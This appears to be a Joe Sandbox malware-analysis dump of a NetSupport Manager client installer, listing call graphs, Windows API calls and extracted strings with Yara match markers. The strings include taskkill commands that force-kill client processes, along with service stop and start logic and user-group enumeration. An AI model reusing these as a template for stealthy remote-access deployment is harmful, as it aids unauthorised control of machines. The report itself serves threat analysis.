5da5b0 149 API calls 60754->60755 60756 5ddf6a 60755->60756 60757 5da5b0 149 API calls 60756->60757 60758 5ddf76 60757->60758 60891 5e9116 60758->60891 60761 5eab18 77 API calls 60762 5de032 60761->60762 60763 5eab18 77 API calls 60762->60763 60764 5de077 60763->60764 60899 5df6d0 GetVersionExW 60764->60899 60766 5de07f 60767 5de0dd GetModuleFileNameW 60766->60767 60768 5de087 GetPrivateProfileStringW lstrcmpiW 60766->60768 60770 5de0fc 60767->60770 60771 5de0f6 GetLastError 60767->60771 60768->60767 60769 5de0d3 60768->60769 60769->60767 60772 5df030 210 API calls 60770->60772 60771->60770 60773 5de10d 60772->60773 60774 5df030 210 API calls 60773->60774 60775 5de11c 60774->60775 60776 5d6080 222 API calls 60775->60776 60777 5de129 60776->60777 60921 5ed09c DeleteFileW 60777->60921 60779 5de15a 60927 5db1f0 60779->60927 60781 5de189 60782 5de663 60781->60782 60933 5ea558 85 API calls 60781->60933 60784 5de705 60782->60784 60786 5de678 GetCurrentDirectoryW 60782->60786 60792 5de688 60782->60792 60785 5df030 210 API calls 60784->60785 60787 5dedc7 60785->60787 60786->60792 60788 5dede7 DestroyWindow 60787->60788 60789 5dedd3 PostMessageW 60787->60789 60790 5def27 60788->60790 60791 5dee02 60788->60791 60789->60788 60794 5e82b3 5 API calls 60790->60794 60798 5e9583 136 API calls 60791->60798 60934 5d78f0 6 API calls 60792->60934 60796 5def34 60794->60796 60795 5de6ce 60797 5df030 210 API calls 60795->60797 60796->60654 60799 5de6e3 60797->60799 60800 5dee2e 60798->60800 60799->60784 60802 5de6f2 60799->60802 60801 5dee48 60800->60801 60936 5e73d1 99 API calls 60800->60936 60804 5dee6e 60801->60804 60805 5dee53 Sleep 60801->60805 60935 5d4050 138 API calls 60802->60935 60809 5df030 210 API calls 60804->60809 60808 5df030 210 API calls 60805->60808 60806 5dee42 60937 5e8c09 102 API calls 60806->60937 60811 5dee68 60808->60811 60812 5dee7b 60809->60812 60938 5d4420 221 API calls 60811->60938 60814 5e82b3 5 API calls 60812->60814 60815 5dee8d 60814->60815 60815->60654 
61031 5ecae1 60816->61031 60818 5ecc32 60818->60655 60819->60628 60820->60632 60825->60658 60826->60667 60827->60672 60828->60674 60829->60685 60830->60668 60831->60704 60832->60711 60833->60720 60834->60717 60835->60717 60836->60725 60838 5f8267 EncodePointer 60837->60838 60838->60838 60839 5f8281 60838->60839 60839->60729 60841 5d60af GetLastError 60840->60841 60842 5d60b7 60840->60842 60841->60842 60843 5d613c 60842->60843 60844 5d60f7 wsprintfW MessageBoxW 60842->60844 60939 5d5690 60843->60939 60845 5e82b3 5 API calls 60844->60845 60847 5d6138 60845->60847 60847->60736 60848 5d614b 60849 5df030 210 API calls 60848->60849 60850 5d6163 60849->60850 60851 5df030 210 API calls 60850->60851 60852 5d6172 60851->60852 60854 5df030 210 API calls 60852->60854 60856 5d61ca SetCurrentDirectoryW 60852->60856 60854->60856 60855 5d623c 60951 5df5b0 60855->60951 60856->60855 60858 5d6246 60856->60858 60858->60858 60955 5ec0c4 60858->60955 60860 5e82b3 5 API calls 60862 5d6399 60860->60862 60862->60736 60863 5ec0c4 68 API calls 60865 5d62c1 60863->60865 60864 5d62c8 60864->60860 60865->60864 60866 5ec0c4 68 API calls 60865->60866 60867 5d631b 60866->60867 60867->60864 60868 5ec0c4 68 API calls 60867->60868 60868->60864 60870 5d54d8 GetProcAddress 60869->60870 60871 5d55b1 60869->60871 60870->60871 60873 5d54f1 GetProcAddress 60870->60873 60872 5e82b3 5 API calls 60871->60872 60874 5d55be 60872->60874 60873->60871 60875 5d5507 GetUserNameW 60873->60875 60874->60746 60878 5d5541 60875->60878 60876 5d5580 60877 5d55aa FreeLibrary 60876->60877 60877->60871 60878->60876 60878->60877 60879 5d5582 60878->60879 60880 5df030 210 API calls 60878->60880 60984 5b0c30 187 API calls 60879->60984 60880->60878 60883 5e9cbb 60882->60883 60884 5e9cbf 60882->60884 60883->60748 60985 5eb552 66 API calls 60884->60985 60886 5e9cd4 60886->60883 60986 5e847c 66 API calls 60886->60986 60888 5e9ce7 60888->60883 60889 5e9cf2 60888->60889 60987 5ed649 10 API calls 60889->60987 60892 5e918e 60891->60892 
60893 5e9125 60891->60893 60990 5e9013 78 API calls 60892->60990 60898 5ddf86 60893->60898 60988 5ecfc7 66 API calls 60893->60988 60896 5e9131 60989 5ed6b5 11 API calls 60896->60989 60898->60761 60900 5df718 LoadLibraryW 60899->60900 60902 5df7b8 GetProcAddress 60900->60902 60903 5df7f3 60900->60903 60906 5df7ea FreeLibrary 60902->60906 60907 5df7c6 GetCurrentProcess 60902->60907 60904 5df865 60903->60904 60905 5df7fb GetModuleHandleW GetProcAddress 60903->60905 60910 5e82b3 5 API calls 60904->60910 60908 5df828 60905->60908 60909 5df812 GetNativeSystemInfo 60905->60909 60906->60903 60912 5df7d4 60907->60912 60915 5df030 210 API calls 60908->60915 60909->60908 60911 5df839 60909->60911 60913 5df875 60910->60913 60914 5df030 210 API calls 60911->60914 60912->60906 60917 5df030 210 API calls 60912->60917 60913->60766 60916 5df847 60914->60916 60915->60904 60918 5e82b3 5 API calls 60916->60918 60919 5df7e7 60917->60919 60920 5df857 60918->60920 60919->60906 60920->60766 60922 5ed0ae GetLastError 60921->60922 60923 5ed0b6 60921->60923 60922->60923 60924 5ed0c8 60923->60924 60991 5ecfed 66 API calls 60923->60991 60924->60779 60926 5ed0c2 60926->60779 60930 5db20c 60927->60930 60932 5db244 60927->60932 60928 5e82b3 5 API calls 60929 5db264 60928->60929 60929->60781 60992 5d9ef0 60930->60992 60932->60928 60933->60781 60934->60795 60935->60784 60936->60806 60937->60801 60938->60804 60940 5d569d 60939->60940 60941 5d5843 60940->60941 60942 5d56da GetModuleHandleW GetProcAddress 60940->60942 60944 5e82b3 5 API calls 60941->60944 60943 5d56f5 GetLongPathNameW 60942->60943 60948 5d570e 60942->60948 60945 5e82b3 5 API calls 60943->60945 60946 5d58a9 60944->60946 60947 5d570a 60945->60947 60946->60848 60947->60848 60948->60941 60950 5d574b 60948->60950 60950->60941 60950->60950 60958 5d55d0 7 API calls 60950->60958 60952 5df5c0 60951->60952 60952->60952 60953 5df030 210 API calls 60952->60953 60954 5df5d6 60953->60954 60954->60858 60959 5ec045 60955->60959 60958->60950 60960 
5ec06c 60959->60960 60961 5ec052 60959->60961 60960->60961 60963 5ec075 GetFileAttributesW 60960->60963 60977 5ecfda 66 API calls 60961->60977 60965 5ec083 GetLastError 60963->60965 60968 5ec099 60963->60968 60964 5ec057 60978 5ecfc7 66 API calls 60964->60978 60980 5ecfed 66 API calls 60965->60980 60970 5d628e 60968->60970 60982 5ecfda 66 API calls 60968->60982 60969 5ec05e 60979 5ed6b5 11 API calls 60969->60979 60970->60863 60970->60864 60971 5ec08f 60981 5ecfc7 66 API calls 60971->60981 60975 5ec0ac 60983 5ecfc7 66 API calls 60975->60983 60977->60964 60978->60969 60979->60970 60980->60971 60981->60970 60982->60975 60983->60971 60984->60876 60985->60886 60986->60888 60987->60883 60988->60896 60989->60898 60990->60898 60991->60926 60993 5d9f31 60992->60993 60994 5e9583 136 API calls 60993->60994 60995 5d9f95 60994->60995 60996 5d9fb8 60995->60996 60997 5d9fa2 60995->60997 61022 5d2110 118 API calls 60996->61022 60998 5e82b3 5 API calls 60997->60998 61000 5d9fb4 60998->61000 61000->60932 61001 5d9fc5 61023 5d1e20 82 API calls 61001->61023 61003 5da000 61015 5da0f6 61003->61015 61024 5e83d7 67 API calls 61003->61024 61006 5da27b 61007 5e82b3 5 API calls 61006->61007 61008 5da28d 61007->61008 61008->60932 61009 5da014 61009->61015 61025 5d6c20 68 API calls 61009->61025 61011 5da0db 61026 5d1e20 82 API calls 61011->61026 61013 5da0ee 61013->61015 61027 5d1e20 82 API calls 61013->61027 61030 5e8c09 102 API calls 61015->61030 61018 5da12b 61018->61015 61019 5d7710 67 API calls 61018->61019 61020 5d2000 WideCharToMultiByte 61018->61020 61021 5e8406 67 API calls 61018->61021 61028 5d6c20 68 API calls 61018->61028 61029 5d1e20 82 API calls 61018->61029 61019->61018 61020->61018 61021->61018 61022->61001 61023->61003 61024->61009 61025->61011 61026->61013 61027->61018 61028->61018 61029->61018 61030->61006 61032 5ecaed 61031->61032 61033 5f92ea 61 API calls 61032->61033 61034 5ecaf4 61033->61034 61036 5ecb1f DecodePointer 61034->61036 61039 5ecb9e 61034->61039 61038 5ecb36 
DecodePointer 61036->61038 61036->61039 61050 5ecb49 61038->61050 61052 5ecc0c 61039->61052 61040 5ecc1b 61040->60818 61042 5ecc03 61044 5ec94c 3 API calls 61042->61044 61045 5ecc0c 61044->61045 61046 5ecc19 61045->61046 61059 5f91f9 LeaveCriticalSection 61045->61059 61046->60818 61047 5ecb60 DecodePointer 61058 5f299e EncodePointer 61047->61058 61050->61039 61050->61047 61051 5ecb6f DecodePointer DecodePointer 61050->61051 61057 5f299e EncodePointer 61050->61057 61051->61050 61053 5ecbec 61052->61053 61054 5ecc12 61052->61054 61053->61040 61056 5f91f9 LeaveCriticalSection 61053->61056 61060 5f91f9 LeaveCriticalSection 61054->61060 61056->61042 61057->61050 61058->61050 61059->61046 61060->61053 61061 5c5bb0 61062 5c5bbd 61061->61062 61063 5c5c00 61061->61063 61064 5c5beb 61062->61064 61065 5c5bc2 SetEvent 61062->61065 61068 5c5c0f CloseHandle 61063->61068 61069 5c5c12 61063->61069 61064->61063 61067 5c5bf5 CloseHandle 61064->61067 61066 5c5bd2 61065->61066 61066->61064 61070 5c5bdb WaitForSingleObject 61066->61070 61067->61063 61068->61069 61071 5c5c18 CloseHandle 61069->61071 61072 5c5c1b 61069->61072 61070->61064 61070->61066 61071->61072 61073 5de492 61074 5de49b 61073->61074 61075 5d6080 222 API calls 61074->61075 61076 5de581 61075->61076 61077 5df030 210 API calls 61076->61077 61078 5de587 61077->61078 61079 5df030 210 API calls 61078->61079 61080 5de598 61079->61080

                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,DE64E134), ref: 005D967A
                                                                                          • GetLastError.KERNEL32 ref: 005D96BB
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000034), ref: 005D96DD
                                                                                          • GetLastError.KERNEL32 ref: 005D96E5
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D970C
                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000208), ref: 005D98EB
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 005D9972
                                                                                          • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,00000000,00000000), ref: 005D9988
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastOpenService$CreateDirectoryManagerObjectProcessQuerySingleStatusSystemWait
                                                                                          • String ID: AllowStop (admin) ret %x$AllowStop (direct vista) ret %x$AllowStop (service vista) ret %x$AllowStop (service) ret %x$AllowStop ret %x$Attempt to start the service$Attempt to stop the service$CICWClass$Calling %s$Client32 (%s)$ControlService failed with %d$D$Global\CICWClass$Global\CICWClassAdmin$Global\CICWClassVista$Global\NSMWClass$Global\NSMWClassAdmin$Global\NSMWClassVista$NSMWClass$NSMWClassVista$PCIapp$RESTART$Restarted client32 service after %s$START$STOP$Service Manager : %08x - %d$Service State : %d$Service failed to start after 60 seconds$Service failed to stop after 60 seconds$Service is running$Service is stopped$Service isn't in Stopped state$Service isn't running$Service started ok$Service stopped ok$StartService failed with %d$StartService ok$Use old method$Waiting a while until stopped$\net$\taskkill.exe /F /IM cicStudent.exe /IM cicplugin.exe /IM cicplugin64.exe$\taskkill.exe /F /IM client32.exe /IM runplugin.exe /IM runplugin64.exe$client32 control finished$close service$close service manager$crash$done taskkill$hClient %08x - %d$restart$start$stop

                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 005C4790
                                                                                          • LoadLibraryW.KERNELBASE(?,?), ref: 005C47D8
                                                                                          • LoadLibraryW.KERNELBASE(DBGHELP.DLL,?,?), ref: 005C47E9
                                                                                          • LoadLibraryW.KERNEL32(IMAGEHLP.DLL,?,?), ref: 005C47F8
                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 005C47FE
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 005C4812
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 005C4831
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 005C483C
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 005C4847
                                                                                          • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 005C4852
                                                                                          • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 005C485D
                                                                                          • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 005C4868
                                                                                          • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 005C4873
                                                                                          • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 005C487E
                                                                                          • GetProcAddress.KERNEL32(00000000,SymRefreshModuleList), ref: 005C4889
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 005C4894
                                                                                          • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 005C489F
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 005C48AA
                                                                                          • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 005C48B5
                                                                                          • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 005C48C0
                                                                                          • GetProcAddress.KERNELBASE(00000000,MiniDumpWriteDump), ref: 005C48CB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad$Module$FileHandleName
                                                                                          • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymRefreshModuleList$SymSetOptions$dbghelp.dll

                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                          • wsprintfW.USER32 ref: 005DF09D
                                                                                          • wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                          • wsprintfW.USER32 ref: 005DF0D3
                                                                                          • InitializeCriticalSection.KERNEL32(0064250C), ref: 005DF1A6
                                                                                          • EnterCriticalSection.KERNEL32(0064250C), ref: 005DF1BB
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 005DF1F5
                                                                                            • Part of subcall function 005E7CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,752F55F0,?,005B97EE,00000000,?,?), ref: 005E7CE9
                                                                                          • GetKeyState.USER32(00000011), ref: 005DF33D
                                                                                          • GetKeyState.USER32(00000010), ref: 005DF346
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: CriticalSectionStatewsprintf$AllocateCurrentDirectoryEnterHeapInitializeLocalTimewvsprintf
                                                                                          • String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d $@$C:\Windows\Installer\$C:\Windows\Installer\$Log$Log=$SOFTWARE\Productive Computer Insight\%s$a+t$a+tc$winst32$winst32.log$winstall

                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0003A490,00000000,00000000,00000000), ref: 005DDE15
                                                                                          • GetModuleFileNameW.KERNEL32(00590000,?,00000100), ref: 005DDE34
                                                                                          • GetLastError.KERNEL32 ref: 005DDE3A
                                                                                          • GetUserNameW.ADVAPI32(?,00000050), ref: 005DDE89
                                                                                          • LoadStringW.USER32(?,000003E8,?,00000100), ref: 005DDF37
                                                                                          • wsprintfW.USER32 ref: 005DDF51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Name$ErrorExceptionFileFilterLastLoadModuleStringUnhandledUserwsprintf
                                                                                          • String ID: $/EC$/ec$Command Line: %s$NSM$NetSupport Manager for Windows (32 bit) V14.10$PCD$Start, session=%d, user=%s$V14.10$V15.10$boot$display.drv$module=%s$shellscr.drv$system.ini$ver=%s$winexec.ok

                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005CA299
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 005CA2E0
                                                                                          • wsprintfW.USER32 ref: 005CA2F4
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 005CA310
                                                                                          • GetLastError.KERNEL32 ref: 005CA31A
                                                                                          • LocalAlloc.KERNEL32(00000040,00000014), ref: 005CA32F
                                                                                          • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 005CA340
                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 005CA34D
                                                                                          • wsprintfW.USER32 ref: 005CA37F
                                                                                          • CreateEventW.KERNEL32(0000000C,00000000,00000000,?), ref: 005CA39A
                                                                                          • GetLastError.KERNEL32 ref: 005CA3A5
                                                                                          • CloseHandle.KERNEL32(000001EC), ref: 005CA3B9
                                                                                          • wsprintfW.USER32 ref: 005CA3E9
                                                                                          • CreateEventW.KERNEL32(0000000C,00000000,00000000,?), ref: 005CA404
                                                                                          • LocalFree.KERNEL32(?), ref: 005CA412
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005CA420
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005CA42F
                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005CA43E
                                                                                          • CreateThread.KERNELBASE(00000000,00002000,Function_00035A70,00000000,00000000,?), ref: 005CA45C
                                                                                          • SetThreadPriority.KERNELBASE(00000000,00000002), ref: 005CA46D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Create$Event$wsprintf$DescriptorErrorLastLocalSecurityThread$AllocCloseCurrentDaclFileFreeHandleInitializeModuleNamePriorityProcess
                                                                                          • String ID: %s.dmp.%05d$%s.dmp.%d$%s.maxidmp.%d$?????????

                                                                                          APIs
                                                                                          • GetVersionExW.KERNEL32(?,77340900,?,00000000), ref: 005DF6F7
                                                                                          • LoadLibraryW.KERNEL32(kernel32.dll), ref: 005DF7A6
                                                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 005DF7BE
                                                                                          • GetCurrentProcess.KERNEL32(00642534), ref: 005DF7CB
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005DF7EB
                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 005DF805
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 005DF80C
                                                                                          • GetNativeSystemInfo.KERNELBASE(?), ref: 005DF819
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$CurrentFreeHandleInfoLoadModuleNativeProcessSystemVersion
                                                                                          • String ID: GetNativeSystemInfo$GetNativeSystemInfo missing$IsWow64Process$cpu is x64, setting wow64=TRUE$cpu type is %d, probably not x64$iswow64process, setting wow64=TRUE$kernel32.dll
                                                                                          • API String ID: 3154316710-1749150432
                                                                                          • Opcode ID: 8fa8a5dce91bd64332c111f53f185bea8da40defb8c0af0ebff38eea0ea454a3
                                                                                          • Instruction ID: 5afb224a41cc21f6f85c31f10db2ffa7059d89de5a9e18219c9b45fe04f466b6
                                                                                          • Opcode Fuzzy Hash: 8fa8a5dce91bd64332c111f53f185bea8da40defb8c0af0ebff38eea0ea454a3
                                                                                          • Instruction Fuzzy Hash: 09412779E006169FC728EF6CACA9AED7AA3FB85701F75507BE40782350D6700981CF51

                                                                                          APIs
                                                                                          • GetKeyState.USER32(00000011), ref: 005DF33D
                                                                                          • GetKeyState.USER32(00000010), ref: 005DF346
                                                                                          • wsprintfW.USER32 ref: 005DF3A2
                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,00000000), ref: 005DF3C5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: State$Openwsprintf
                                                                                          • String ID: @$Log$Log=$SOFTWARE\Productive Computer Insight\%s$winst32$winst32.log$winstall
                                                                                          • API String ID: 1774555400-2723375655
                                                                                          • Opcode ID: 7fa90e3ad77cd6266f2e0eb203e0bffa104245743cd68d0af566ca505de00c9e
                                                                                          • Instruction ID: 617b62a6eb61e069b6a787f3ead707d7a08ae65a7ba648c0236bef211aa3a2ba
                                                                                          • Opcode Fuzzy Hash: 7fa90e3ad77cd6266f2e0eb203e0bffa104245743cd68d0af566ca505de00c9e
                                                                                          • Instruction Fuzzy Hash: 3D41157590021A9BCF34DB64DC56BEE7BB5FB44304F54447BE60AA6280EB706A88CF61

                                                                                          APIs
                                                                                          • LoadLibraryW.KERNELBASE(NETAPI32), ref: 005D54C8
                                                                                          • GetProcAddress.KERNELBASE(00000000,NetUserGetLocalGroups), ref: 005D54E5
                                                                                          • GetProcAddress.KERNELBASE(00000000,NetApiBufferFree), ref: 005D54F7
                                                                                          • GetUserNameW.ADVAPI32(?,00000050), ref: 005D5515
                                                                                          • FreeLibrary.KERNELBASE(00000000), ref: 005D55AB
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProcwsprintf$FreeLoadLocalNameTimeUserwvsprintf
                                                                                          • String ID: Member of Local Group: %ls$NETAPI32$NetApiBufferFree$NetUserGetLocalGroups$P$e:\nsmsrc\nsm\1410\1410\nt\winst32.c$pTmpBuf != NULL
                                                                                          • API String ID: 3987117131-593064418
                                                                                          • Opcode ID: c7b18d7b67fe78b33895445119e37c5f4dcc0296ee3d3800f28c8052d98c30a3
                                                                                          • Instruction ID: fb2c17783e99d9bdeb70b7dc0339c7314fe7eb1cdbbea6121ca4600057762ec1
                                                                                          • Opcode Fuzzy Hash: c7b18d7b67fe78b33895445119e37c5f4dcc0296ee3d3800f28c8052d98c30a3
                                                                                          • Instruction Fuzzy Hash: D531C671E00739ABCB319B549C45BDEBB7ABF45B00F05419BF50963240E7705E448FA2

                                                                                          APIs
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                            • Part of subcall function 005D9630: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,DE64E134), ref: 005D967A
                                                                                            • Part of subcall function 005D9630: GetLastError.KERNEL32 ref: 005D96BB
                                                                                            • Part of subcall function 005D9630: OpenServiceW.ADVAPI32(00000000,00000000,00000034), ref: 005D96DD
                                                                                            • Part of subcall function 005D9630: GetLastError.KERNEL32 ref: 005D96E5
                                                                                            • Part of subcall function 005D9630: QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D970C
                                                                                          • FindWindowW.USER32(?,?), ref: 005DD7DD
                                                                                          • EnumWindows.USER32(Function_000450A0,00000000), ref: 005DD7FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLastOpenServicewsprintf$EnumFindLocalManagerQueryStatusTimeWindowWindowswvsprintf
